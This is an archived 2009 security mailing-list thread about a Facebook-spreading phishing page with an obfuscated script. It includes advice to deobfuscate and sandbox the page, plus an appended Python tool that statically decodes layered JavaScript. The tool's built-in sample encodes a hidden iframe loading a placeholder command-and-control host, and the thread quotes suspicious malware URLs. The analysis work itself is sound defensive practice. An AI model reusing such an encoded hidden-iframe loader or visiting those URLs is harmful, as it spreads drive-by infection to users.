PaulDotCom mailing list archives

phishing question


From: pj_mcgarvey at hotmail.com (PJ McGarvey)
Date: Tue, 1 Dec 2009 21:47:18 -0500


Well, if you mean what does the obfuscated code do, there are a few sites I've used that can "de-obfuscate" code 
however sometimes all that can tell you is that "yeah, it's probably malicious".  I would google for "javascript 
deobfuscate".

You could submit the blogspot site to an online sandbox for analysis, like I just did:

http://anubis.iseclab.org/?action=result&task_id=1c4a179271c4d4ee4f5b9820e431f7281&format=html

and possibly find other URLs found in the de-obfuscated code to see what they do.... like this one 
http://1nonsensical.cn/?pid=312s02&sid=4db12f

... I've yet to find a .cn domain name I could trust.  LOL.

Follow down the rabbit hole... 

That way you can find out if the PC was infected, and how to clean it up.

Otherwise it would seem like some sort of Facebook worm that spreads using the FB address book.  Was the user logged 
into Facebook at the time?  Might be a good idea to change their password; it sounds like it either used the active 
Facebook session to send itself out, or maybe a cookie with the user's saved credentials.

PJ

From: chris.blazek at gmail.com
Date: Tue, 1 Dec 2009 14:54:36 -0600
To: pauldotcom at mail.pauldotcom.com
Subject: [Pauldotcom] phishing question

A coworker clicked on a link in an email and was directed to Facebook, then redirected to the following site: 
despatiesmercemerce . blogspot . com 
All of their FB contacts then received the same email. I pulled up the site in Malzilla and noticed a script block in 
the header that looks like it's obfuscated. 

I was wondering if someone in the group could figure out what the site was trying to do.

Thanks,
Chris
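The triage PJ outlines above (peel the obfuscation, pull out the URLs the script reaches for, hand them to a sandbox), as an added Python example that is not part of the original thread. The page it analyzes is a constructed stand-in for the blogspot site, built inline, and the example.invalid hostnames are placeholders; the script rewrites unescape()/String.fromCharCode() literals statically and never executes the JavaScript.

```python
import re
from urllib.parse import quote, unquote

# Constructed sample (not the blogspot page from the thread; hostnames are placeholders):
# a <head> script hiding its content behind unescape() wrapping String.fromCharCode().
INNER_JS = ('var u="http://example.invalid/?pid=1";'
            'document.write(\'<iframe src="http://c2.example.invalid/x" width=1 height=1>\');')
LAYER2 = "<script>eval(String.fromCharCode(%s))</script>" % ",".join(str(ord(c)) for c in INNER_JS)
SAMPLE_HTML = ("<html><head><title>Blog</title><script>document.write(unescape('"
               + quote(LAYER2, safe="") + "'))</script></head><body>Nothing here.</body></html>")

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")

def js_unescape(s):
    """Mimic JS unescape(): decode %uXXXX (unknown to urllib) before the %XX forms."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)

TRANSFORMS = (
    (UNESCAPE_RE, lambda m: js_unescape(m.group(2))),
    (FROMCHARCODE_RE, lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())),
)

def peel(js, max_layers=10):
    """Rewrite one obfuscation literal per pass until nothing changes; returns
    (decoded text, layers removed). Purely textual: no JavaScript is executed."""
    layers = 0
    while layers < max_layers:
        for rx, fn in TRANSFORMS:
            new = rx.sub(fn, js)
            if new != js:
                js, layers = new, layers + 1
                break
        else:
            break
    return js, layers

def analyze(html_text):
    """Indicators for a sandbox or blocklist: URLs in the decoded scripts, depth, eval use."""
    urls, layers, uses_eval = set(), 0, False
    for block in SCRIPT_RE.findall(html_text):
        decoded, n = peel(block)
        layers = max(layers, n)
        uses_eval = uses_eval or "eval(" in decoded
        urls.update(URL_RE.findall(decoded))
    return {"urls": sorted(urls), "layers": layers, "uses_eval": uses_eval}

if __name__ == "__main__":
    print(analyze(SAMPLE_HTML))
```

Each URL it reports is a candidate for a sandbox submission or a proxy block, not something to open in a browser.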
